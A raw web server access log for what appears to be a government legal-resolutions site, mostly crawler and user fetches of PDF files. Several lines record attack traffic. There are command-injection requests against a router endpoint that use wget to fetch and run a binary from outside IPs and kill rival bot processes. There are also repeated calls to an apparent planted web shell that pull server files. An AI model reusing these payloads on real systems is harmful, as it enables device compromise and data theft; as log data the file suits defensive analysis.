172.22.2.4 - - [24/Jun/2024:07:49:33 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679&usuario=&sector=&fecha=2003&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:49:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679&usuario=&sector=&fecha=2003&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:49:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0679&usuario=&sector=&fecha=2003&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:49:37 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=679&usuario=&sector=&fecha=2003&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:49:37 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=679&usuario=&sector=&fecha=2003&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:49:37 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=679&usuario=&sector=&fecha=2003&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:49:38 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=679&usuario=&sector=&fecha=2003&resuelve= HTTP/1.1" 200 626
66.249.66.19 - - [24/Jun/2024:07:49:38 -0500] "GET /BLA/resoluciones/AUTOS%202020/2782.pdf HTTP/1.1" 200 316176
66.249.66.19 - - [24/Jun/2024:07:49:44 -0500] "GET /BLA/resoluciones/AUTOS%202020/1320.pdf HTTP/1.1" 200 359020
66.249.66.19 - - [24/Jun/2024:07:49:50 -0500] "GET /BLA/resoluciones/AUTOS%202020/4377.pdf HTTP/1.1" 200 413583
66.249.66.19 - - [24/Jun/2024:07:49:56 -0500] "GET /BLA/resoluciones/AUTOS%202020/2191.pdf HTTP/1.1" 200 333419
66.249.66.20 - - [24/Jun/2024:07:50:02 -0500] "GET /BLA/resoluciones/AUTOS%202020/3686.pdf HTTP/1.1" 200 349753
201.245.192.253 - - [24/Jun/2024:07:50:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [24/Jun/2024:07:50:06 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000006%20DEL%2013%20DE%20JULIO%20DEL%202023.pdf HTTP/1.1" 304 -
66.249.66.20 - - [24/Jun/2024:07:50:08 -0500] "GET /BLA/resoluciones/AUTOS%202020/4606.pdf HTTP/1.1" 200 361691
185.191.127.212 - - [24/Jun/2024:07:50:13 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
66.249.66.20 - - [24/Jun/2024:07:50:14 -0500] "GET /BLA/resoluciones/AUTOS%202020/0437.pdf HTTP/1.1" 200 331346
66.249.66.21 - - [24/Jun/2024:07:50:20 -0500] "GET /BLA/resoluciones/AUTOS%202020/1442.pdf HTTP/1.1" 200 594013
52.167.144.145 - - [24/Jun/2024:07:50:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0300.pdf HTTP/1.1" 304 -
201.245.192.253 - - [24/Jun/2024:07:50:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [24/Jun/2024:07:50:26 -0500] "GET /BLA/resoluciones/AUTOS%202020/1606.pdf HTTP/1.1" 200 500292
66.249.66.20 - - [24/Jun/2024:07:50:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/1333.pdf HTTP/1.1" 200 358092
66.249.66.19 - - [24/Jun/2024:07:50:38 -0500] "GET /BLA/resoluciones/AUTOS%202020/0742.pdf HTTP/1.1" 200 345603
66.249.66.19 - - [24/Jun/2024:07:50:43 -0500] "GET /BLA/resoluciones/AUTOS%202020/4684.pdf HTTP/1.1" 200 349645
66.249.66.20 - - [24/Jun/2024:07:50:49 -0500] "GET /BLA/resoluciones/AUTOS%202020/3610.pdf HTTP/1.1" 200 416265
66.249.66.20 - - [24/Jun/2024:07:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202020/2375.pdf HTTP/1.1" 200 361990
66.249.66.20 - - [24/Jun/2024:07:51:01 -0500] "GET /BLA/resoluciones/AUTOS%202020/1372.pdf HTTP/1.1" 200 358523
66.249.66.19 - - [24/Jun/2024:07:51:07 -0500] "GET /BLA/resoluciones/AUTOS%202020/3603.pdf HTTP/1.1" 200 338913
66.249.66.19 - - [24/Jun/2024:07:51:13 -0500] "GET /BLA/resoluciones/AUTOS%202020/3390.pdf HTTP/1.1" 200 356839
66.249.66.20 - - [24/Jun/2024:07:51:19 -0500] "GET /BLA/resoluciones/AUTOS%202020/3347.pdf HTTP/1.1" 200 411440
201.245.192.253 - - [24/Jun/2024:07:51:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [24/Jun/2024:07:51:25 -0500] "GET /BLA/resoluciones/AUTOS%202020/3829.pdf HTTP/1.1" 200 339353
172.22.2.4 - - [24/Jun/2024:07:49:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.19 - - [24/Jun/2024:07:51:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/4624.pdf HTTP/1.1" 200 649529
66.249.66.19 - - [24/Jun/2024:07:51:37 -0500] "GET /BLA/resoluciones/AUTOS%202020/4101.pdf HTTP/1.1" 200 360747
66.249.66.19 - - [24/Jun/2024:07:51:43 -0500] "GET /BLA/resoluciones/AUTOS%202020/4418.pdf HTTP/1.1" 200 982546
66.249.66.20 - - [24/Jun/2024:07:51:49 -0500] "GET /BLA/resoluciones/AUTOS%202020/3171.pdf HTTP/1.1" 200 710993
66.249.66.20 - - [24/Jun/2024:07:51:55 -0500] "GET /BLA/resoluciones/AUTOS%202020/4382.pdf HTTP/1.1" 200 1375788
66.249.66.20 - - [24/Jun/2024:07:52:01 -0500] "GET /BLA/resoluciones/AUTOS%202020/4843.pdf HTTP/1.1" 200 367589
216.245.221.92 - - [24/Jun/2024:07:52:05 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.19 - - [24/Jun/2024:07:52:07 -0500] "GET /BLA/resoluciones/AUTOS%202020/1425.pdf HTTP/1.1" 200 319586
66.249.66.20 - - [24/Jun/2024:07:52:13 -0500] "GET /BLA/resoluciones/AUTOS%202020/4952.pdf HTTP/1.1" 200 676937
172.22.2.4 - - [24/Jun/2024:07:52:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01851&usuario=&sector=&fecha=2015&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:52:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01851&usuario=&sector=&fecha=2015&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:52:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01851&usuario=&sector=&fecha=2015&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:52:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01851&usuario=&sector=&fecha=2015&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:50:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
66.249.66.21 - - [24/Jun/2024:07:52:19 -0500] "GET /BLA/resoluciones/AUTOS%202020/3335.pdf HTTP/1.1" 200 376497
172.22.2.4 - - [24/Jun/2024:07:52:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1851&usuario=&sector=&fecha=2015&resuelve= HTTP/1.1" 200 1184
172.22.2.4 - - [24/Jun/2024:07:52:20 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1851&usuario=&sector=&fecha=2015&resuelve= HTTP/1.1" 200 1184
201.245.192.253 - - [24/Jun/2024:07:52:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [24/Jun/2024:07:52:20 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1851&usuario=&sector=&fecha=2015&resuelve= HTTP/1.1" 200 1184
66.249.66.20 - - [24/Jun/2024:07:52:25 -0500] "GET /BLA/resoluciones/AUTOS%202020/2149.pdf HTTP/1.1" 200 990088
66.249.66.20 - - [24/Jun/2024:07:52:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/2088.pdf HTTP/1.1" 200 335812
45.148.10.174 - - [24/Jun/2024:07:52:34 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [24/Jun/2024:07:52:35 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
66.249.66.19 - - [24/Jun/2024:07:52:37 -0500] "GET /BLA/resoluciones/AUTOS%202020/4582.pdf HTTP/1.1" 200 389586
66.249.66.19 - - [24/Jun/2024:07:52:43 -0500] "GET /BLA/resoluciones/AUTOS%202020/2140.pdf HTTP/1.1" 200 324443
66.249.66.19 - - [24/Jun/2024:07:52:49 -0500] "GET /BLA/resoluciones/AUTOS%202020/3145.pdf HTTP/1.1" 200 360541
66.249.66.19 - - [24/Jun/2024:07:52:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/4601.pdf HTTP/1.1" 200 361363
66.249.66.20 - - [24/Jun/2024:07:53:00 -0500] "GET /BLA/resoluciones/AUTOS%202020/0103.pdf HTTP/1.1" 200 293978
66.249.66.20 - - [24/Jun/2024:07:53:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/2586.pdf HTTP/1.1" 200 327700
172.22.2.4 - - [24/Jun/2024:07:53:07 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
66.249.66.19 - - [24/Jun/2024:07:53:12 -0500] "GET /BLA/resoluciones/AUTOS%202020/2346.pdf HTTP/1.1" 200 328416
66.249.66.19 - - [24/Jun/2024:07:53:18 -0500] "GET /BLA/resoluciones/AUTOS%202020/3747.pdf HTTP/1.1" 200 351602
201.245.192.253 - - [24/Jun/2024:07:53:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [24/Jun/2024:07:53:24 -0500] "GET /BLA/resoluciones/AUTOS%202020/1378.pdf HTTP/1.1" 200 359346
172.22.2.4 - - [24/Jun/2024:07:53:27 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0301&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1157
190.157.70.191 - - [24/Jun/2024:07:53:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0301.pdf HTTP/1.1" 200 507362
40.77.167.61 - - [24/Jun/2024:07:53:33 -0500] "GET /Publicaciones/2024EE06610.pdf HTTP/1.1" 404 227
66.249.66.20 - - [24/Jun/2024:07:53:36 -0500] "GET /BLA/resoluciones/AUTOS%202020/2338.pdf HTTP/1.1" 200 328770
66.249.66.19 - - [24/Jun/2024:07:53:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/0421.pdf HTTP/1.1" 200 1094892
66.249.66.20 - - [24/Jun/2024:07:53:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/2228.pdf HTTP/1.1" 200 591653
66.249.66.20 - - [24/Jun/2024:07:53:48 -0500] "GET /BLA/resoluciones/AUTOS%202020/1181.pdf HTTP/1.1" 200 340873
66.249.66.19 - - [24/Jun/2024:07:53:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/4264.pdf HTTP/1.1" 200 362191
66.249.66.19 - - [24/Jun/2024:07:54:00 -0500] "GET /BLA/resoluciones/AUTOS%202020/4688.pdf HTTP/1.1" 200 369287
66.249.66.20 - - [24/Jun/2024:07:54:02 -0500] "GET /BLA/resoluciones/AUTOS%202020/3259.pdf HTTP/1.1" 200 370621
66.249.66.19 - - [24/Jun/2024:07:54:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/1732.pdf HTTP/1.1" 200 1423068
52.167.144.222 - - [24/Jun/2024:07:54:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0346.pdf HTTP/1.1" 200 599930
66.249.66.20 - - [24/Jun/2024:07:54:12 -0500] "GET /BLA/resoluciones/AUTOS%202020/0933.pdf HTTP/1.1" 200 347131
66.249.66.21 - - [24/Jun/2024:07:54:18 -0500] "GET /BLA/resoluciones/AUTOS%202020/1555.pdf HTTP/1.1" 200 425647
201.245.192.253 - - [24/Jun/2024:07:54:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [24/Jun/2024:07:54:24 -0500] "GET /BLA/resoluciones/AUTOS%202020/3491.pdf HTTP/1.1" 200 389023
66.249.66.19 - - [24/Jun/2024:07:54:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/2110.pdf HTTP/1.1" 200 357481
66.249.66.20 - - [24/Jun/2024:07:54:36 -0500] "GET /BLA/resoluciones/AUTOS%202020/1133.pdf HTTP/1.1" 200 323447
66.249.66.19 - - [24/Jun/2024:07:54:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/3294.pdf HTTP/1.1" 200 458333
66.249.66.19 - - [24/Jun/2024:07:54:48 -0500] "GET /BLA/resoluciones/AUTOS%202020/1074.pdf HTTP/1.1" 200 417678
66.249.66.19 - - [24/Jun/2024:07:54:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/1553.pdf HTTP/1.1" 200 1263839
66.249.66.20 - - [24/Jun/2024:07:55:00 -0500] "GET /BLA/resoluciones/AUTOS%202020/0797.pdf HTTP/1.1" 200 356041
201.245.192.253 - - [24/Jun/2024:07:55:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.21 - - [24/Jun/2024:07:55:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/2848.pdf HTTP/1.1" 200 2149735
66.249.66.20 - - [24/Jun/2024:07:55:12 -0500] "GET /BLA/resoluciones/AUTOS%202020/3047.pdf HTTP/1.1" 200 349753
47.128.114.104 - - [24/Jun/2024:07:55:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=sql.lib.php&ft=download HTTP/1.1" 200 86405
66.249.66.20 - - [24/Jun/2024:07:55:17 -0500] "GET /BLA/resoluciones/AUTOS%202020/1490.pdf HTTP/1.1" 200 265901
201.245.192.253 - - [24/Jun/2024:07:55:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [24/Jun/2024:07:55:23 -0500] "GET /BLA/resoluciones/AUTOS%202020/1464.pdf HTTP/1.1" 200 1152235
47.128.31.54 - - [24/Jun/2024:07:55:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=select_server.lib.php&ft=download HTTP/1.1" 200 3386
66.249.66.19 - - [24/Jun/2024:07:55:29 -0500] "GET /BLA/resoluciones/AUTOS%202020/3628.pdf HTTP/1.1" 200 340704
66.249.66.20 - - [24/Jun/2024:07:55:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/1011.pdf HTTP/1.1" 200 365235
66.249.66.19 - - [24/Jun/2024:07:55:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/2224.pdf HTTP/1.1" 200 361959
66.249.66.19 - - [24/Jun/2024:07:55:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/3675.pdf HTTP/1.1" 200 373045
47.128.63.10 - - [24/Jun/2024:07:55:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=DbSearch.class.php&ft=download HTTP/1.1" 200 18070
66.249.66.19 - - [24/Jun/2024:07:55:53 -0500] "GET /BLA/resoluciones/AUTOS%202020/5012.pdf HTTP/1.1" 200 402976
47.128.31.4 - - [24/Jun/2024:07:55:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=import.lib.php&ft=download HTTP/1.1" 200 42488
66.249.66.20 - - [24/Jun/2024:07:55:59 -0500] "GET /BLA/resoluciones/AUTOS%202020/3326.pdf HTTP/1.1" 200 330238
66.249.66.19 - - [24/Jun/2024:07:56:05 -0500] "GET /BLA/resoluciones/AUTOS%202020/3701.pdf HTTP/1.1" 200 340606
103.203.56.1 - - [24/Jun/2024:07:56:06 -0500] "GET / HTTP/1.1" 200 319
66.249.66.19 - - [24/Jun/2024:07:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/2611.pdf HTTP/1.1" 200 408386
47.128.24.51 - - [24/Jun/2024:07:56:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5C&f=favicon.ico&ft=download HTTP/1.1" 200 7782
66.249.66.19 - - [24/Jun/2024:07:56:17 -0500] "GET /BLA/resoluciones/AUTOS%202020/4776.pdf HTTP/1.1" 200 399013
201.245.192.253 - - [24/Jun/2024:07:56:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [24/Jun/2024:07:56:23 -0500] "GET /BLA/resoluciones/AUTOS%202020/00021.pdf HTTP/1.1" 200 276026
47.128.41.202 - - [24/Jun/2024:07:56:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=SpotCarneSilvestre_HD_Finalparamedios.flv&ft=download&white=1 HTTP/1.1" 200 3751557
66.249.66.20 - - [24/Jun/2024:07:56:29 -0500] "GET /BLA/resoluciones/AUTOS%202020/2232.pdf HTTP/1.1" 200 366003
66.249.66.19 - - [24/Jun/2024:07:56:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/3514.pdf HTTP/1.1" 200 326341
66.249.66.19 - - [24/Jun/2024:07:56:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/4395.pdf HTTP/1.1" 200 391267
47.128.125.123 - - [24/Jun/2024:07:56:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Message.class.php&ft=download HTTP/1.1" 200 18915
66.249.66.19 - - [24/Jun/2024:07:56:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/2340.pdf HTTP/1.1" 200 344123
66.249.66.19 - - [24/Jun/2024:07:56:50 -0500] "GET /BLA/resoluciones/AUTOS%202023/2463.pdf HTTP/1.1" 304 -
66.249.66.19 - - [24/Jun/2024:07:56:53 -0500] "GET /BLA/resoluciones/AUTOS%202020/4362.pdf HTTP/1.1" 200 2040890
47.128.124.149 - - [24/Jun/2024:07:56:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cdbi%5C&f=DBIDrizzle.class.php&ft=download HTTP/1.1" 200 22463
66.249.66.21 - - [24/Jun/2024:07:56:59 -0500] "GET /BLA/resoluciones/AUTOS%202020/1444.pdf HTTP/1.1" 200 383558
66.249.66.21 - - [24/Jun/2024:07:57:05 -0500] "GET /BLA/resoluciones/AUTOS%202020/3083.pdf HTTP/1.1" 200 356171
216.245.221.92 - - [24/Jun/2024:07:57:05 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [24/Jun/2024:07:57:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/0836.pdf HTTP/1.1" 200 335425
66.249.66.20 - - [24/Jun/2024:07:57:17 -0500] "GET /BLA/resoluciones/AUTOS%202020/0026.pdf HTTP/1.1" 200 314072
47.128.28.38 - - [24/Jun/2024:07:57:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CPMA-RAMSAR&f=Resoluci%F3n+de+adopci%F3n_Resoluci%F3n+SDA-CAR+No.+37+de+2023.pdf&ft=download HTTP/1.1" 200 278130
172.22.2.4 - - [24/Jun/2024:07:55:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:57:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [24/Jun/2024:07:57:23 -0500] "GET /BLA/resoluciones/AUTOS%202020/2354.pdf HTTP/1.1" 200 332334
47.128.44.22 - - [24/Jun/2024:07:57:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4739.pdf&ft=download&white=1 HTTP/1.1" 200 487079
66.249.66.19 - - [24/Jun/2024:07:57:29 -0500] "GET /BLA/resoluciones/AUTOS%202020/3364.pdf HTTP/1.1" 200 410052
66.249.66.19 - - [24/Jun/2024:07:57:34 -0500] "GET /BLA/resoluciones/AUTOS%202020/1100.pdf HTTP/1.1" 200 329669
66.249.66.19 - - [24/Jun/2024:07:57:40 -0500] "GET /BLA/resoluciones/AUTOS%202020/3943.pdf HTTP/1.1" 200 375468
47.128.116.45 - - [24/Jun/2024:07:57:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cconfig%5C&f=Validator.class.php&ft=download HTTP/1.1" 200 19856
66.249.66.19 - - [24/Jun/2024:07:57:46 -0500] "GET /BLA/resoluciones/AUTOS%202020/2819.pdf HTTP/1.1" 200 356508
66.249.66.19 - - [24/Jun/2024:07:57:52 -0500] "GET /BLA/resoluciones/AUTOS%202020/0477.pdf HTTP/1.1" 200 291718
141.98.83.197 - - [24/Jun/2024:07:57:55 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [24/Jun/2024:07:57:56 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
66.249.66.20 - - [24/Jun/2024:07:57:58 -0500] "GET /BLA/resoluciones/AUTOS%202020/0182.pdf HTTP/1.1" 200 273125
47.128.117.100 - - [24/Jun/2024:07:57:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0429.pdf&ft=download HTTP/1.1" 200 794279
66.249.66.20 - - [24/Jun/2024:07:58:04 -0500] "GET /BLA/resoluciones/AUTOS%202020/1611.pdf HTTP/1.1" 200 870191
172.22.2.4 - - [24/Jun/2024:07:56:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.19 - - [24/Jun/2024:07:58:10 -0500] "GET /BLA/resoluciones/AUTOS%202020/0773.pdf HTTP/1.1" 200 391343
47.128.116.57 - - [24/Jun/2024:07:58:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Partition.class.php&ft=download HTTP/1.1" 200 2216
66.249.66.20 - - [24/Jun/2024:07:58:16 -0500] "GET /BLA/resoluciones/AUTOS%202020/3958.pdf HTTP/1.1" 200 399925
201.245.192.253 - - [24/Jun/2024:07:58:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [24/Jun/2024:07:58:22 -0500] "GET /BLA/resoluciones/AUTOS%202020/4265.pdf HTTP/1.1" 200 384196
47.128.116.4 - - [24/Jun/2024:07:58:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Creqs%5C&f=footer.php&ft=download&white=1 HTTP/1.1" 200 557
201.245.192.253 - - [24/Jun/2024:07:58:31 -0500] "GET /forms/frmservlet?config=sai HTTP/1.1" 200 4134
172.22.2.4 - - [24/Jun/2024:07:58:35 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01002&usuario=&sector=&fecha=2016&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:58:36 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01002&usuario=&sector=&fecha=2016&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:58:36 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01002&usuario=&sector=&fecha=2016&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [24/Jun/2024:07:58:39 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=01002&usuario=&sector=&fecha=2016&resuelve= HTTP/1.1" 200 626
66.249.66.20 - - [24/Jun/2024:07:58:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/3170.pdf HTTP/1.1" 200 322861
47.128.39.191 - - [24/Jun/2024:07:58:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3976.pdf&ft=download&white=1 HTTP/1.1" 200 20135
66.249.66.21 - - [24/Jun/2024:07:58:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/1173.pdf HTTP/1.1" 200 381116
201.245.192.253 - - [24/Jun/2024:07:58:45 -0500] "GET /forms/frmservlet?config=sai HTTP/1.1" 200 4042
66.249.66.19 - - [24/Jun/2024:07:58:45 -0500] "GET /BLA/resoluciones/AUTOS%202020/1473.pdf HTTP/1.1" 200 898420
66.249.66.19 - - [24/Jun/2024:07:58:48 -0500] "GET /BLA/resoluciones/AUTOS%202020/3820.pdf HTTP/1.1" 200 405060
201.245.192.253 - - [24/Jun/2024:07:58:49 -0500] "GET /forms/java/frmall_jinit.jar HTTP/1.1" 304 -
201.245.192.253 - - [24/Jun/2024:07:58:49 -0500] "GET /forms/java/icons.jar HTTP/1.1" 304 -
201.245.192.253 - - [24/Jun/2024:07:58:49 -0500] "GET /forms/java/java/awt/KeyboardFocusManager.class HTTP/1.1" 404 352
201.245.192.253 - - [24/Jun/2024:07:58:49 -0500] "GET /forms/java/java/awt/KeyboardFocusManager.class HTTP/1.1" 404 352
201.245.192.253 - - [24/Jun/2024:07:58:50 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [24/Jun/2024:07:58:50 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [24/Jun/2024:07:58:50 -0500] "GET /forms/java/java/awt/event/MouseWheelListener.class HTTP/1.1" 404 356
201.245.192.253 - - [24/Jun/2024:07:58:50 -0500] "GET /forms/java/java/awt/event/MouseWheelListener.class HTTP/1.1" 404 356
201.245.192.253 - - [24/Jun/2024:07:58:50 -0500] "GET /forms/java/oracle/forms/registry/Registry.dat HTTP/1.1" 200 4213
201.245.192.253 - - [24/Jun/2024:07:58:50 -0500] "GET /forms/java/oracle/forms/registry/default.dat HTTP/1.1" 404 350
201.245.192.253 - - [24/Jun/2024:07:58:50 -0500] "GET /forms/frmservlet?config=sai&acceptLanguage=es-CO,es;q=0.5&ifcmd=startsession HTTP/1.1" 200 118
201.245.192.253 - - [24/Jun/2024:07:58:51 -0500] "GET /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0?ifcmd=getinfo&ifhost=A1DGCAC7ST8&ifip=192.168.173.79 HTTP/1.1" 200 8
